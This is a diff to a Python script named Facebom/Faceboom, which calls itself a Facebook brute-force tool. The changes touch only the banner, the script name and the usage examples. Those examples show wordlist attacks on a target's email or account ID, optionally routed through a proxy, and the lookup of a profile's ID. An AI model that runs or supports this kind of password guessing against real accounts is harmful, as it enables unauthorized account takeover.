@@ -138,9 +138,9 @@ def FBOM(username, wordlist, proxy=None,passwd=None):
138138 proxystatus = prox + wi + "[" + gr + "ON" + wi + "]" if useproxy != False else yl + "[" + rd + "OFF" + yl + "]"
139139 print (gr + """
140140==================================
141- [---] """ + wi + """Facebom """ + gr + """ [---]
141+ [---] """ + wi + """Faceboom """ + gr + """ [---]
142142==================================
143- [---] """ + wi + """BruteForce Facebook """ + gr + """ [---]
143+ [---] """ + wi + """Bruteforcing Facebook """ + gr + """ [---]
144144==================================
145145[---] """ + yl + """CONFIG""" + gr + """ [---]
146146==================================
@@ -223,7 +223,7 @@ def FBOM(username, wordlist, proxy=None,passwd=None):
223223 exit (1 )
224224
225225parse = optparse .OptionParser (wi + """
226- Usage: python ./facebom .py [OPTIONS...]
226+ Usage: python ./faceboom .py [OPTIONS...]
227227-------------
228228OPTIONS:
229229 |
@@ -241,15 +241,15 @@ def FBOM(username, wordlist, proxy=None,passwd=None):
241241Examples:
242242 |
243243 |--------
244- | python facebom .py -t [email protected] -w /usr/share/wordlists/rockyou .txt 244+ | python faceboom .py -t [email protected] -w wlist .txt 245245 |--------
246- | python Facebom .py -t 100001013078780 -w C: \\ Users \\ Me \\ Desktop \\ wordlist .txt
246+ | python Faceboom .py -t 100001013078780 -w wlist .txt
247247 |--------
248- | python facebom .py -t [email protected] -w D: \\ wordlist .txt -p 35.236.37.121 default(port=8080,80) 248+ | python faceboom .py -t [email protected] -w wlist .txt -p 165.227.35.11 default(port=8080,80) 249249 |--------
250- | python facebom .py -t [email protected] -s 1234567 250+ | python faceboom .py -t [email protected] -s 1234567 251251 |--------
252- | python facebom .py -g https://www.facebook.com/alanwalker97
252+ | python faceboom .py -g https://www.facebook.com/victim-username
253253 |--------
254254""" )
255255def Main ():
0 commit comments